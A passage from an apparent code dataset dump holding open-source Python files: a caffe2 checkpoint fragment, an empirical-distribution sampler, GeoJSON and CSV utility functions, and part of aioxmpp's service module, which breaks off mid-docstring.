logger.info('Saving checkpoint ...')\n client.run(self.checkpoint.save(epoch))\n logger.info('Checkpoint saved.')\n\n if any(stop_signals):\n logger.info('Stopping.')\n break\n epoch += 1\n client.run(self.job.exit_group)\n return epoch\n\n def load_blobs_from_checkpoints(self, blob_names, epoch, session):\n \"\"\"Loads the necessary blobs from the checkpoints.\n\n Checkpoints store the snapshots of the workspace in each node.\n Sometimes we only need to load a subset of the blobs from the\n checkpoints. One common scenario is to load only the model blobs from\n the checkpoints for evaluation purpose. 
Given the names of the necessary\n blobs, this function goes over all the checkpoints of all the nodes, but\n only loads the blobs specified in the blob_names to the current\n workspace.\n\n Args:\n blob_names: A list of strings. Each string is the name of a\n blob.\n epoch: An integer. The checkpoint epoch to load from.\n session: A Session object to execute the load ops.\n\n Raises:\n ValueError: When the checkpoint manager is invalid.\n \"\"\"\n if not self.checkpoint:\n raise ValueError('Checkpoint manager is None')\n logger.info('Loading checkpoint for epoch {} ...'.format(epoch))\n return self.checkpoint.load_blobs_locally(self.job.nodes_to_checkpoint(),\n blob_names, epoch, session)\n\n\ndef epoch_limiter(num_epochs):\n \"\"\"\n Creates a task that will output True when a given\n number of epochs has finished.\n \"\"\"\n with Job.current().init_group:\n init_net = core.Net('epoch_counter_init')\n counter = init_net.CreateCounter([], init_count=num_epochs - 1)\n Task(step=init_net)\n epoch_net = core.Net('epoch_countdown')\n finished = epoch_net.CountDown(counter)\n output = Task(step=epoch_net, outputs=finished).outputs()[0]\n Job.current().add_stop_signal(output)\n","repo_name":"lumtis/react-native-caffe2","sub_path":"caffe2/caffe2/python/checkpoint.py","file_name":"checkpoint.py","file_ext":"py","file_size_in_byte":15471,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"21"} +{"seq_id":"5091223433","text":"\"\"\" draw from an empirical distribution, uses the inverse\n transformation method and linear interpolation\"\"\"\n\nimport numpy as np\nimport random\n#import scipy\nimport pylab\n\n\ndef draw_empirical(data, r):\n \"\"\"one draw (for given r ~ U(0,1)) from the\n empirical cdf based on data\"\"\"\n\n d = {x: data.count(x) for x in data}\n obs_values, freq = zip(*sorted(zip(d.keys(), d.values())))\n obs_values = list(obs_values)\n freq = list(freq)\n empf = [x*1.0/len(data) for x in freq]\n ecum = np.cumsum(empf).tolist()\n ecum.insert(0, 0)\n obs_values.insert(0, 0)\n\n for x in ecum:\n if r <= x:\n rpt = x\n break\n r_end = ecum.index(rpt)\n y = obs_values[r_end] - 1.0*(ecum[r_end]-r)*(obs_values[r_end] -\n obs_values[r_end-1])/(ecum[r_end]-ecum[r_end-1])\n return y\n\n\n# Experiment ---------\nif __name__ == \"__main__\":\n\n data = [1, 2, 2, 2, 6, 2, 5, 9, 4, 4]\n r = random.random()\n\n print(r)\n print(draw_empirical(data, r))\n\n##ys = scipy.rand(10000)\n##xs = [draw_empirical(data, a) for a in ys]\n# pylab.scatter(xs,ys)\n# pylab.show()\n","repo_name":"kevinye-git/DATA304project","sub_path":"Code/draw_emp.py","file_name":"draw_emp.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"21618629244","text":"import csv\nimport json\nfrom pathlib import Path\nfrom typing import Dict\nfrom typing import Generator\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport geojson\nimport geopandas as gpd\nimport pandas as pd\nimport shapely.geometry\n\nfrom geoschema.google_s2 import points_to_s2_cell_token\nfrom geoschema.proj_utils import LONLAT4326_PYPROJ_CRS\nfrom geoschema.proj_utils import valid_lonlat\nfrom geoschema.uuid_utils import get_uuids\n\nfrom geoschema.logger import get_logger\n\nLOGGER = get_logger()\n\n\ndef geojson_from_gdf(gdf: gpd.GeoDataFrame) -> Dict:\n feature_collection = geojson.loads(gdf.to_json())\n assert len(feature_collection[\"features\"]) == 
len(gdf)\n return feature_collection\n\n\ndef df_with_uuid(df: pd.DataFrame):\n LOGGER.info(\"Adding UUIDs to DataFrame\")\n uuids = get_uuids(len(df))\n df[\"uuid\"] = pd.Series(uuids, dtype=\"string\")\n\n\ndef gdf_with_uuid(gdf: gpd.GeoDataFrame):\n \"\"\"\n Add a 'uuid' column\n :param gdf: a geopandas.GeoDataFrame\n \"\"\"\n LOGGER.info(\"Adding UUIDs to GeoDataFrame\")\n uuids = get_uuids(len(gdf))\n gdf[\"uuid\"] = pd.Series(uuids, dtype=\"string\")\n\n\ndef gdf_with_google_s2(gdf: gpd.GeoDataFrame):\n \"\"\"\n Add a 's2_cell_id' column for a Google s2 cell ID from the geometry,\n assuming that the geometry is in WGS84 (lon, lat) points\n :param gdf: a geopandas.GeoDataFrame\n \"\"\"\n LOGGER.info(\"Adding google S2 CellId to GeoDataFrame\")\n s2_cells = points_to_s2_cell_token(points=gdf.geometry)\n gdf[\"s2_cell_id\"] = pd.Series(s2_cells, dtype=\"string\")\n\n\ndef gdf_validate_lonlat_points(gdf: gpd.GeoDataFrame, wrap: bool = False) -> bool:\n \"\"\"\n Validate that a GeoDataFrame has a CRS in EPSG:4326 and that\n all the geometry shapes are points with (lon,lat) values\n\n :param gdf: a geopandas.GeoDataFrame\n :param wrap: wrap any longitude value within [-180, 180)\n \"\"\"\n if not LONLAT4326_PYPROJ_CRS.is_exact_same(gdf.crs):\n LOGGER.error(\"CRS (%s) is not exact same as WGS84 EPSG:4326\", gdf.crs)\n return False\n for p in gdf.geometry:\n assert isinstance(p, shapely.geometry.Point)\n if valid_lonlat(p.x, p.y, wrap) is None:\n LOGGER.error(\"POINT (%s) is not in WGS84 bounds\", p)\n return False\n return True\n\n\ndef gdf_from_csv_file(\n csv_file: Union[Path, str],\n lon_field: str = \"longitude\",\n lat_field: str = \"latitude\",\n add_uuid: bool = True,\n add_s2: bool = True,\n) -> gpd.GeoDataFrame:\n \"\"\"\n Read a CSV file that contains WGS84 longitude and latitude\n columns for point geometries\n\n .. seealso::\n - https://geopandas.org/gallery/create_geopandas_from_pandas.html\n\n :param csv_file: a string or Path to a CSV file\n :param lon_field: the name of the longitude column\n :param lat_field: the name of the latitude column\n :param add_s2: add google s2 cell ID to each point\n :param add_uuid: add a UUID to each point\n :return: a geopandas.GeoDataFrame\n \"\"\"\n\n # TODO: support a WKT geometry field too, e.g.\n # from shapely import wkt\n # df['Coordinates'] = df['Coordinates'].apply(wkt.loads)\n\n # TODO: validate lon,lat are in WGS84\n LOGGER.info(\"Reading: %s\", csv_file)\n\n csv_df = pd.read_csv(csv_file)\n assert isinstance(csv_df[lon_field], pd.Series)\n assert isinstance(csv_df[lat_field], pd.Series)\n\n LOGGER.info(\"Composing GeoDataFrame with EPSG:4326\")\n csv_gdf = gpd.GeoDataFrame(\n csv_df,\n geometry=gpd.points_from_xy(csv_df[lon_field], csv_df[lat_field]),\n crs=\"EPSG:4326\",\n )\n\n # Note: don't do a merge of two GeoDataFrames like this, it can result in extra rows\n # uuid_gdf = gpd.GeoDataFrame({\"geometry\": csv_gdf.geometry, \"uuid\": uuids})\n # csv_gdf.merge(uuid_gdf)\n\n if add_uuid:\n gdf_with_uuid(csv_gdf)\n\n if add_s2:\n gdf_with_google_s2(csv_gdf)\n\n return csv_gdf\n\n\ndef geojson_from_csv_file(\n csv_file: Union[Path, str],\n lon_field: str = \"longitude\",\n lat_field: str = \"latitude\",\n) -> Dict:\n \"\"\"\n Read a CSV file that contains WGS84 longitude and latitude\n columns for point geometries\n\n .. 
seealso::\n - https://geopandas.org/gallery/create_geopandas_from_pandas.html\n\n :param csv_file: a string or Path to a CSV file\n :param lon_field: the name of the longitude column\n :param lat_field: the name of the latitude column\n :return: a geojson feature collection (as dict)\n \"\"\"\n csv_gdf = gdf_from_csv_file(csv_file, lon_field, lat_field)\n return geojson_from_gdf(csv_gdf)\n\n\ndef geojson_limit_features(\n collection: Dict, offset: int = None, limit: int = None\n) -> Tuple[Dict, int]:\n \"\"\"\n Limit GeoJSON features\n\n :param collection: a geojson feature collection\n :param offset: Optional start index for the features to return\n :param limit: Optional upper limit on the number of features to return\n :return: tuple of (geojson, total_features)\n \"\"\"\n total_features = len(collection[\"features\"])\n LOGGER.debug(\"Total collection['features']: %s\", total_features)\n if offset is not None and limit is not None:\n offset = int(offset)\n limit = int(limit)\n LOGGER.debug(\"Limit features with offset: %s, limit: %s\", offset, limit)\n collection[\"features\"] = collection[\"features\"][offset : offset + limit]\n return collection, total_features\n\n\ndef geojson_fields(geojson_feature: Dict, sort: bool = False) -> List[str]:\n \"\"\"\n Extract property fields from a geojson Feature\n\n These fields can be used to convert GeoJSON data to CSV. The fields\n can be sorted as an option; the default order is based on the\n ordered dictionary for the property keys (plus 'wkt').\n\n .. code-block::\n\n geojson_feature = geojson[\"features\"][0]\n fields = geojson_fields(geojson_feature)\n\n Assuming the fields are consistent across all the geojson features, this\n list of fields can be used to extract all the values into lists with a\n consistent order of values. A generic 'wkt' field is added to hold a\n Well Known Text (wtk) representation of feature geometry.\n\n :param geojson_feature: a geojson Feature\n :param sort: sort the fields (defaults to False)\n In recent versions of python, the `properties` dictionary will be\n an ordered dictionary, so the order of the fields in the returned\n list should be consistent and based on the order of the property keys.\n :return: a list of property fields, which are all assumed\n to be the field names of the feature-properties in the geojson;\n it will be constructed from the geojson feature-properties.\n \"\"\"\n csv_fields = list(geojson_feature[\"properties\"].keys())\n if sort:\n csv_fields = sorted(csv_fields)\n return csv_fields + [\"wkt\"]\n\n\ndef geojson_to_csv(geojson_data: Dict, csv_fields: List[str] = None) -> List[List]:\n \"\"\"\n Convert geojson FeatureCollection to CSV lists\n\n This can be used to convert geojson to CSV and save a CSV file, e.g. assuming\n the geojson_data contains features with a Point geometry:\n\n .. 
code-block::\n\n import csv\n import json\n\n with open(\"input.geojson\", \"r\") as geojson_fd:\n geojson_data = json.load(geojson_fd)\n\n feature = geojson_data[\"features\"][0]\n fields = geojson_fields(feature)\n csv_rows = geojson_to_csv(geojson_data, csv_fields=fields)\n\n with open('csv_file.csv', \"w\") as f:\n csv_writer = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)\n csv_writer.writerows(csv_rows)\n\n :param geojson_data: a geojson FeatureCollection\n :param csv_fields: an optional list of CSV header fields, which are all assumed\n to be the field names of the feature-properties in the geojson_data;\n if this is not provided, it will be constructed from the properties\n of the first feature in the geojson_data[\"features\"] (with the\n assumption that feature coordinates can be represented as WKT).\n :return: a list of one or more lists with CSV values in each list; the\n first list is the fields of the CSV header\n \"\"\"\n if csv_fields is None:\n feature = geojson_data[\"features\"][0]\n csv_fields = geojson_fields(feature)\n\n csv_rows = [csv_fields]\n for feature in geojson_data[\"features\"]:\n properties = feature[\"properties\"]\n csv_row = []\n for field in csv_fields:\n if field in [\"wkt\", \"WKT\"]:\n wkt = shapely.geometry.shape(feature[\"geometry\"]).wkt\n csv_row.append(wkt)\n else:\n csv_row.append(properties.get(field))\n csv_rows.append(csv_row)\n\n return csv_rows\n\n\ndef geojson_file_to_csv_file(\n geojson_file: str, csv_file: str = None, csv_fields: List[str] = None\n) -> str:\n \"\"\"\n Convert geojson file to csv file\n\n :param geojson_file: a file path string for a .geojson file\n that is assumed to contain a geojson FeatureCollection\n :param csv_file: an optional file path string for a .csv file; if it is\n not provided, the geojson_file is used to output a new .csv file with\n the same file path and file name.\n :param csv_fields: an optional list of CSV header fields, which are all assumed\n to be the field names of the feature-properties in the geojson file;\n if this is not provided, it will be constructed from the geojson\n feature-properties (with the assumption that the coordinates can\n be represented as WKT values).\n :return: CSV file (a file path string)\n \"\"\"\n if csv_file is None:\n csv_file = str(Path(geojson_file).with_suffix(\".csv\"))\n\n LOGGER.debug(\"Converting from geojson: %s\", geojson_file)\n LOGGER.debug(\"Converting to csv: %s\", csv_file)\n\n with open(geojson_file, \"r\") as geojson_fd:\n geojson_data = geojson.load(geojson_fd)\n\n csv_rows = geojson_to_csv(geojson_data, csv_fields)\n\n with open(csv_file, \"w\") as f:\n csv_writer = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)\n csv_writer.writerows(csv_rows)\n\n return csv_file\n\n\ndef geojsons_dump(geojson_features: List[Dict], geojsons_file: str) -> Optional[str]:\n \"\"\"\n :param geojson_features: a list of geojson features; from any\n feature collection, this is geojson_collection[\"features\"]\n :param geojsons_file: a file path to write\n :return: if the dump succeeds, return the geojsons_file, or None\n \"\"\"\n LOGGER.info(\"Saving GeoJSONSeq to %s\", geojsons_file)\n with open(geojsons_file, \"w\") as dst:\n for feature in geojson_features:\n geojson.dump(feature, dst)\n dst.write(\"\\n\")\n\n geojsons_path = Path(geojsons_file)\n if geojsons_path.is_file() and geojsons_path.stat().st_size > 0:\n return geojsons_file\n\n\ndef geojsons_load(geojsons_file: Union[Path, str]) -> List[Dict]:\n \"\"\"\n Read GeoJSON Text Sequence data from a file\n\n :param 
geojsons_file: a file path to write\n :return: geojson features\n\n .. seealso::\n\n - https://tools.ietf.org/html/rfc8142\n\n \"\"\"\n file = Path(geojsons_file)\n assert file.exists()\n file_content = file.read_text()\n geojsons = file_content.splitlines()\n # some geojsons lines could be empty\n features = []\n while geojsons:\n feature = geojsons.pop(0).strip()\n if feature:\n features.append(json.loads(feature))\n return features\n\n\ndef geojsons_yield(geojsons_file: Union[Path, str]) -> Generator[Dict, None, None]:\n \"\"\"\n Read GeoJSON Text Sequence data from a file\n and yield each geojson feature for each line\n\n :param geojsons_file: a file path to write\n :return: yield geojson features\n\n .. seealso::\n\n - https://tools.ietf.org/html/rfc8142\n\n \"\"\"\n file = Path(geojsons_file)\n assert file.exists()\n with open(file, \"r\") as fd:\n while True:\n feature_line = fd.readline()\n if not feature_line:\n break\n # some geojsons lines could be empty\n feature = feature_line.strip()\n if feature:\n yield json.loads(feature)\n\n\ndef verify_geojson_output(file: Path) -> bool:\n if not file.suffix == \".geojson\":\n return False\n if file.exists() and file.stat().st_size > 0:\n with open(file, \"r\") as fd:\n geojson.load(fd)\n return True\n return False\n\n\ndef verify_json_output(file: Path) -> bool:\n if not file.suffix == \".json\":\n return False\n if file.exists() and file.stat().st_size > 0:\n with open(file, \"r\") as fd:\n json.load(fd)\n return True\n return False\n","repo_name":"dazza-codes/geoschema","sub_path":"geoschema/geojson_utils.py","file_name":"geojson_utils.py","file_ext":"py","file_size_in_byte":12670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32684272426","text":"########################################################################\n# File name: service.py\n# This file is part of: aioxmpp\n#\n# LICENSE\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program. If not, see\n# .\n#\n########################################################################\n\"\"\"\n:mod:`~aioxmpp.service` --- Utilities for implementing :class:`~.Client` services\n#################################################################################\n\nProtocol extensions or in general support for parts of the XMPP protocol are\nimplemented using :class:`Service` classes, or rather, classes which use the\n:class:`Meta` metaclass.\n\nBoth of these are provided in this module. To reduce the boilerplate required\nto develop services, :ref:`decorators ` are\nprovided which can be used to easily register coroutines and functions as\nstanza handlers, filters and others.\n\n.. autoclass:: Service\n\n.. _api-aioxmpp.service-decorators:\n\nDecorators and Descriptors\n==========================\n\nThese decorators provide special functionality when used on methods of\n:class:`Service` subclasses.\n\n.. 
note::\n\n These decorators work only on methods declared on :class:`Service`\n subclasses, as their functionality are implemented in cooperation with the\n :class:`Meta` metaclass and :class:`Service` itself.\n\n.. note::\n\n These decorators and the descriptors (see below) are initialised in the\n order in which they are declared at the class. In many cases, this does\n not matter, but there are some corner cases.\n\n For example: Suppose you have a class like this:\n\n .. code-block:: python\n\n class FooService(aioxmpp.service.Service):\n feature = aioxmpp.disco.register_feature(\n \"some:namespace\"\n )\n\n @aioxmpp.service.depsignal(aioxmpp.DiscoServer, \"on_info_changed\")\n def handle_on_info_changed(self):\n pass\n\n In this case, the ``handle_on_info_changed`` method is not invoked during\n startup of the ``FooService``. In this case however:\n\n .. code-block:: python\n\n class FooService(aioxmpp.service.Service):\n @aioxmpp.service.depsignal(aioxmpp.DiscoServer, \"on_info_changed\")\n def handle_on_info_changed(self):\n pass\n\n feature = aioxmpp.disco.register_feature(\n \"some:namespace\"\n )\n\n The ``handle_on_info_changed`` *is* invoked during startup of the\n ``FooService`` because the ``some:namespace`` feature is registered\n *after* the signal is connected.\n\n .. versionchanged:: 0.9\n\n This behaviour was introduced in version 0.9.\n\n When using a descriptor and a :func:`depsignal`\n connected to :meth:`.DiscoServer.on_info_changed`: if the\n :class:`.disco.register_feature` is declared *before* the :func:`depsignal`,\n the signal handler will not be invoked for that specific feature because\n it is registered before the signal handler is connected).\n\n.. autodecorator:: iq_handler\n\n.. autodecorator:: message_handler\n\n.. autodecorator:: presence_handler\n\n.. autodecorator:: inbound_message_filter()\n\n.. autodecorator:: inbound_presence_filter()\n\n.. autodecorator:: outbound_message_filter()\n\n.. autodecorator:: outbound_presence_filter()\n\n.. autodecorator:: depsignal\n\n.. autodecorator:: depfilter\n\n.. autodecorator:: attrsignal\n\n.. seealso::\n\n :class:`~.disco.register_feature`\n For a descriptor (see below) which allows to register a Service Discovery\n feature when the service is instantiated.\n\n :class:`~.disco.mount_as_node`\n For a descriptor (see below) which allows to register a Service Discovery\n node when the service is instantiated.\n\n :class:`~.pep.register_pep_node`\n For a descriptor (see below) which allows to register a PEP node\n including notification features.\n\nTest functions\n--------------\n\n.. autofunction:: is_iq_handler\n\n.. autofunction:: is_message_handler\n\n.. autofunction:: is_presence_handler\n\n.. autofunction:: is_inbound_message_filter\n\n.. autofunction:: is_inbound_presence_filter\n\n.. autofunction:: is_outbound_message_filter\n\n.. autofunction:: is_outbound_presence_filter\n\n.. autofunction:: is_depsignal_handler\n\n.. autofunction:: is_depfilter_handler\n\n.. autofunction:: is_attrsignal_handler\n\nCreating your own decorators\n----------------------------\n\nSometimes, when you create your own service, it makes sense to create own\ndecorators which depending services can use to make easy use of some features\nof your service.\n\n.. note::\n\n Remember that it isn’t necessary to create custom decorators to simply\n connect a method to a signal exposed by another service. Users of that\n service should be using :func:`depsignal` instead.\n\nThe key part is the :class:`HandlerSpec` object. 
It specifies the effect the\ndecorator has on initialisation and shutdown of the service. To add a\n:class:`HandlerSpec` to a decorated method, use :func:`add_handler_spec` in the\nimplementation of your decorator.\n\n.. autoclass:: HandlerSpec(key, is_unique=True, require_deps=[])\n\n.. autofunction:: add_handler_spec\n\nCreating your own descriptors\n-----------------------------\n\nSometimes a decorator is not the right tool for the job, because with what you\nattempt to achieve, there’s simply no relationship to a method.\n\nIn this case, subclassing :class:`Descriptor` is the way to go. It provides an\nabstract base class implementing a :term:`descriptor`. Using a\n:class:`Descriptor` subclass, you can create objects for each individual\nservice instance using the descriptor, including cleanup.\n\n.. autoclass:: Descriptor\n\nMetaclass\n=========\n\n.. autoclass:: Meta()\n\"\"\" # NOQA: E501\n\nimport abc\nimport asyncio\nimport collections\nimport contextlib\nimport logging\nimport warnings\nimport weakref\n\nimport aioxmpp.callbacks\nimport aioxmpp.stream\n\n\ndef automake_magic_attr(obj):\n obj._aioxmpp_service_handlers = getattr(\n obj, \"_aioxmpp_service_handlers\", {}\n )\n return obj._aioxmpp_service_handlers\n\n\ndef get_magic_attr(obj):\n return obj._aioxmpp_service_handlers\n\n\ndef has_magic_attr(obj):\n return hasattr(\n obj, \"_aioxmpp_service_handlers\"\n )\n\n\nclass Descriptor(metaclass=abc.ABCMeta):\n \"\"\"\n Abstract base class for resource managing descriptors on :class:`Service`\n classes.\n\n While resources such as callback slots can easily be managed with\n decorators (see above), because they are inherently related to the method\n they use, others cannot. A :class:`Descriptor` provides a method to\n initialise a context manager. The context manager is entered when the\n service is initialised and left when the service is shut down, thus\n providing a way for the :class:`Descriptor` to manage the resource\n associated with it.\n\n The result from entering the context manager is accessible by reading the\n attribute the descriptor is bound to.\n\n Subclasses must implement the following:\n\n .. automethod:: init_cm\n\n .. autoattribute:: value_type\n\n Subclasses may override the following to modify the default behaviour:\n\n .. autoattribute:: required_dependencies\n\n .. 
automethod:: add_to_stack\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._data = weakref.WeakKeyDictionary()\n\n @property\n def required_dependencies(self):\n \"\"\"\n Iterable of services which must be declared as dependencies on a class\n using this descriptor.\n\n The default implementation returns an empty list.\n \"\"\"\n return []\n\n @abc.abstractmethod\n def init_cm(self, instance):\n \"\"\"\n Create and return a :term:`context manager`.\n\n :param instance: The service instance for which the CM is used.\n :return: A context manager managing the resource.\n\n The context manager is responsible for acquiring, initialising,\n destroying and releasing the resource managed by this descriptor.\n\n The returned context manager is not stored anywhere in the descriptor;\n it is the responsibility of the caller to register it appropriately.\n \"\"\"\n\n def add_to_stack(self, instance, stack):\n \"\"\"\n Get the context manager for the service `instance` and push it to the\n context manager `stack`.\n\n :param instance: The service to get the context manager for.\n :type instance: :class:`Service`\n :param stack: The context manager stack to push the CM onto.\n :type stack: :class:`contextlib.ExitStack`\n :return: The object returned by the context manager on enter.\n\n If a context manager has already been created for `instance`, it is\n re-used.\n\n On subsequent calls to :meth:`__get__` for the given `instance`, the\n return value of this method will be returned, that is, the value\n obtained from entering the context.\n \"\"\"\n\n cm = self.init_cm(instance)\n obj = stack.enter_context(cm)\n self._data[instance] = cm, obj\n return obj\n\n def __get__(self, instance, owner):\n if instance is None:\n return self\n try:\n cm, obj = self._data[instance]\n except KeyError:\n raise AttributeError(\n \"resource manager descriptor has not been initialised\"\n )\n return obj\n\n @abc.abstractproperty\n def value_type(self):\n \"\"\"\n The type of the value of the descriptor, once it is being accessed\n as an object attribute.\n\n .. versionadded:: 0.9\n \"\"\"\n\n\nclass Meta(abc.ABCMeta):\n \"\"\"\n The metaclass for services. The :class:`Service` class uses it and in\n general you should just inherit from :class:`Service` and define the\n dependency attributes as needed.\n\n Only use :class:`Meta` explicitly if you know what you are doing,\n and you most likely do not. :class:`Meta` is internal API and may\n change at any point.\n\n Services have dependencies. A :class:`Meta` instance (i.e. a service class)\n can declare dependencies using the following attributes.\n\n .. attribute:: ORDER_BEFORE\n\n An iterable of :class:`Service` classes before which the class which is\n currently being declared needs to be instantiated.\n\n Thus, any service which occurs in :attr:`ORDER_BEFORE` will be\n instantiated *after* this class (if at all). Think of it as \"*this*\n class is ordered *before* the classes in this attribute\".\n\n .. versionadded:: 0.3\n\n .. attribute:: SERVICE_BEFORE\n\n Before 0.3, this was the name of the :attr:`ORDER_BEFORE` attribute. It\n is still supported, but its use emits a :data:`DeprecationWarning`. It must\n not be mixed with :attr:`ORDER_BEFORE` or :attr:`ORDER_AFTER` on a class\n declaration, or the declaration will raise :class:`ValueError`.\n\n .. 
deprecated:: 0.3\n\n Support for this attribute will be removed in 1.0; starting with 1.0,\n using this attribute will raise a :class:`TypeError` on class\n declaration and an :class:`AttributeError` when accessing it on a\n class or instance.\n\n .. attribute:: ORDER_AFTER\n\n An iterable of :class:`Service` classes which will be instantiated\n *before* the class which is being declared.\n\n Classes which are declared in this attribute are always instantiated\n before this class is instantiated. Think of it as \"*this* class is\n ordered *after* the classes in this attribute\".\n\n .. versionadded:: 0.3\n\n .. attribute:: SERVICE_AFTER\n\n Before 0.3, this was the name of the :attr:`ORDER_AFTER` attribute. It\n is still supported, but its use emits a :data:`DeprecationWarning`. It must\n not be mixed with :attr:`ORDER_BEFORE` or :attr:`ORDER_AFTER` on a class\n declaration, or the declaration will raise :class:`ValueError`.\n\n .. deprecated:: 0.3\n\n See :attr:`SERVICE_BEFORE` for details on the deprecation cycle.\n\n Further, the following attributes are generated:\n\n .. attribute:: PATCHED_ORDER_AFTER\n\n An iterable of :class:`Service` classes. This includes all\n classes in :attr:`ORDER_AFTER` and all classes which specify the class\n in :attr:`ORDER_BEFORE`.\n\n This is primarily used internally to handle :attr:`ORDER_BEFORE` when\n summoning services.\n\n It is an error to manually define :attr:`PATCHED_ORDER_AFTER` in a class\n definition; doing so will raise a :class:`TypeError`.\n\n .. versionadded:: 0.9\n\n .. versionchanged:: 0.9\n\n The :attr:`ORDER_AFTER` and :attr:`ORDER_BEFORE` attributes do not\n change after class creation. In earlier versions they contained\n the transitive completion of the dependency relation.\n\n The following attribute was generated in earlier versions of\n aioxmpp:\n\n .. attribute:: _DEPGRAPH_NODE\n\n For compatibility with earlier versions, a warning is issued\n when :attr:`_DEPGRAPH_NODE` is defined in a service class\n definition.\n\n This behaviour will be removed in aioxmpp 1.0.\n\n .. deprecated:: 0.11\n\n Dependency relationships must not have cycles; a cycle results in a\n :class:`ValueError` when the class causing the cycle is declared.\n\n .. note::\n\n Subclassing instances of :class:`Meta` is forbidden. Trying to do so\n will raise a :class:`TypeError`.\n\n .. versionchanged:: 0.9\n\n Example::\n\n class Foo(metaclass=service.Meta):\n pass\n\n class Bar(metaclass=service.Meta):\n ORDER_BEFORE = [Foo]\n\n class Baz(metaclass=service.Meta):\n ORDER_BEFORE = [Bar]\n\n class Fourth(metaclass=service.Meta):\n ORDER_BEFORE = [Bar]\n\n ``Baz`` and ``Fourth`` will be instantiated before ``Bar`` and ``Bar`` will\n be instantiated before ``Foo``. There is no dependency relationship between\n ``Baz`` and ``Fourth``.\n \"\"\"\n\n def __new__(mcls, name, bases, namespace, inherit_dependencies=True):\n if \"SERVICE_BEFORE\" in namespace or \"SERVICE_AFTER\" in namespace:\n if \"ORDER_BEFORE\" in namespace or \"ORDER_AFTER\" in namespace:\n raise ValueError(\"declaration mixes old and new ordering \"\n \"attribute names (SERVICE_* vs. ORDER_*)\")\n warnings.warn(\n \"SERVICE_BEFORE/AFTER used on class; use ORDER_BEFORE/AFTER\",\n DeprecationWarning)\n try:\n namespace[\"ORDER_BEFORE\"] = namespace.pop(\"SERVICE_BEFORE\")\n except KeyError:\n pass\n try:\n namespace[\"ORDER_AFTER\"] = namespace.pop(\"SERVICE_AFTER\")\n except KeyError:\n pass\n\n if \"PATCHED_ORDER_AFTER\" in namespace:\n raise TypeError(\n \"PATCHED_ORDER_AFTER must not be defined manually. \"\n \"It is supplied automatically by the metaclass.\"\n )\n\n if \"_DEPGRAPH_NODE\" in namespace:\n warnings.warn(\n \"_DEPGRAPH_NODE should not be defined manually. \"\n \"In versions before 0.11 it was supplied automatically by \"\n \"the metaclass and defining it raised TypeError.\"\n )\n\n if any(isinstance(base, Meta)\n for base in bases) and \"service_order_index\" in namespace:\n raise TypeError(\n \"service_order_index must not be defined manually. \"\n \"It is supplied automatically by the metaclass.\"\n )\n\n for base in bases:\n if isinstance(base, Meta) and base is not Service:\n raise TypeError(\n \"subclassing services is prohibited.\"\n )\n\n for base in bases:\n if hasattr(base, \"SERVICE_HANDLERS\") and base.SERVICE_HANDLERS:\n raise TypeError(\n \"inheritance from service class with handlers is forbidden\"\n )\n\n namespace[\"ORDER_BEFORE\"] = frozenset(\n namespace.get(\"ORDER_BEFORE\", ()))\n namespace[\"ORDER_AFTER\"] = frozenset(\n namespace.get(\"ORDER_AFTER\", ()))\n namespace[\"PATCHED_ORDER_AFTER\"] = namespace[\"ORDER_AFTER\"]\n\n if namespace[\"ORDER_BEFORE\"] and namespace[\"ORDER_AFTER\"]:\n visited = set()\n for item in namespace[\"PATCHED_ORDER_AFTER\"]:\n if item.orders_after_any(namespace[\"ORDER_BEFORE\"],\n visited=visited):\n raise ValueError(\"dependency loop in service definitions\")\n\n SERVICE_HANDLERS = []\n existing_handlers = set()\n\n for attr_name, attr_value in namespace.items():\n if has_magic_attr(attr_value):\n new_handlers = get_magic_attr(attr_value)\n\n unique_handlers = {\n spec.key\n for spec in new_handlers\n if spec.is_unique\n }\n\n conflicting = unique_handlers & existing_handlers\n if conflicting:\n key = next(iter(conflicting))\n obj = next(iter(\n obj\n for obj_key, obj, _ in SERVICE_HANDLERS\n if obj_key == key\n ))\n\n raise TypeError(\n \"handler conflict between {!r} and {!r}: \"\n \"both want to use {!r}\".format(\n obj,\n attr_value,\n key,\n )\n )\n\n existing_handlers |= unique_handlers\n\n for spec, kwargs in new_handlers.items():\n missing = spec.require_deps - namespace[\"ORDER_AFTER\"]\n if missing:\n raise TypeError(\n \"decorator requires dependency {!r} \"\n \"but it is not declared\".format(\n next(iter(missing))\n )\n )\n\n SERVICE_HANDLERS.append(\n (spec.key, attr_value, kwargs)\n )\n\n elif isinstance(attr_value, Descriptor):\n missing = set(attr_value.required_dependencies) - \\\n namespace[\"ORDER_AFTER\"]\n if missing:\n raise TypeError(\n \"descriptor requires dependency {!r} \"\n \"but it is not declared\".format(\n next(iter(missing)),\n )\n )\n\n SERVICE_HANDLERS.append(attr_value)\n\n namespace[\"SERVICE_HANDLERS\"] = tuple(SERVICE_HANDLERS)\n\n return super().__new__(mcls, name, bases, namespace)\n\n def __init__(self, name, bases, namespace, inherit_dependencies=True):\n super().__init__(name, bases, namespace)\n for cls in self.ORDER_BEFORE:\n cls.PATCHED_ORDER_AFTER |= frozenset([self])\n\n def __prepare__(*args, **kwargs):\n return collections.OrderedDict()\n\n @property\n def SERVICE_BEFORE(self):\n return self.ORDER_BEFORE\n\n @property\n def SERVICE_AFTER(self):\n return self.ORDER_AFTER\n\n def orders_after(self, other, *, visited=None):\n \"\"\"\n Return whether `self` depends on `other` and will be instantiated\n later.\n\n :param other: Another service.\n :type other: :class:`aioxmpp.service.Service`\n\n .. 
